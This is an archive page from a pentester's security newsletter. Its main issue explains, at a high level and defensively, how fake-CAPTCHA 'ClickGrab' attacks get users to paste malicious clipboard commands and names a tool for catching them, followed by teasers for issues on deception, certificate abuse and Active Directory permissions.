Pentester/recovering sysadmin Self-proclaimed Ethical Threat Active Directory Security Connoisseur Offensive stuff — securit360.com Host Cyber Threat POV — offsec.blog SWAG — swag.ethicalthreat.com 📩 By subscribing, you’ll get exclusive access to industry insights, actionable tips for securing your environments, behind-the-scenes content from my pentests, and updates from someone who keeps a pulse on the ever-changing cyber threat landscape.
🕵️♂️Ethical Threat Insights: How to Spot and Stop Clickgrab Attacks
|
Admin due diligence crushes clickgrab tricks. Ethical Threat Insight: How to Spot and Stop Clickgrab Attacks Clickgrab isn’t just about tricking users, it’s about tricking you, the admin. The ClickGrab technique is super tricky because of the fake-CAPTCHA pages. The technique is centered around hijacking your clipboard with malicious PowerShell commands and then tricking you into pasting the malicious commands into the run dialog. But there is hope! PasteEater is a super cool utility that lets you inspect clipboard content and catch hidden malicious commands before they run. How the attack typically plays out:
How to learn more about this nasty attack? Check out these awesome resources by Michael Haag and William Metcalf.
Want more defense-ready tricks for your daily routine?
p.s. - when trusting your clipboard backfires…🙃 All the best
"Spirit of a hacker heart of a defender" |
Spencer Alessi
Pentester/recovering sysadmin Self-proclaimed Ethical Threat Active Directory Security Connoisseur Offensive stuff — securit360.com Host Cyber Threat POV — offsec.blog SWAG — swag.ethicalthreat.com 📩 By subscribing, you’ll get exclusive access to industry insights, actionable tips for securing your environments, behind-the-scenes content from my pentests, and updates from someone who keeps a pulse on the ever-changing cyber threat landscape.
More isn’t better. Better is better. Quantity fades. Quality lasts. Ethical Threat Insights: Deception, the best ROI in Security There is a misconception that more security alerts == safer environment. The reality is that’s not true. Better alerts == more actionable evidence means you’re responding to what matters most, not when your server goes haywire because of a benign scheduled task. Deception is the best ROI in security because: It’s inexpensive (especially compared to “traditional”...
Attackers love certificates. They open doors most people forget to lock. Ethical Threat Insight: Certificate Abuse Attacks Think certificates only protect websites? Inside your network, they’re like digital ID cards for users, computers, web servers, and even domain controllers. But here’s the problem… A weak or misconfigured certificate can let attackers: Impersonate administrators Escalate privileges Persist quietly Simple tip: Start by auditing your AD Certificate Services (ADCS) using...
🕵️♂️Ethical Threat Insights #7 | How to Identify Insecure Delegated Permissions in Active Directory
Hey there! Hope you had a great weekend. Let's get into it! 🩺Threat Pulse China’s Tacit Admission of Volt Typhoon Attacks At a December 2024 Geneva summit, China’s Ministry of Foreign Affairs cyber official Wang Lei made ambiguous remarks that U.S. delegates interpreted as a confession of Beijing’s role in the Volt Typhoon campaign—cyber intrusions on U.S. infrastructure tied to Washington’s support for Taiwan. Key Takeaways: The U.S. delegation saw Wang Lei’s comments as a warning: China is...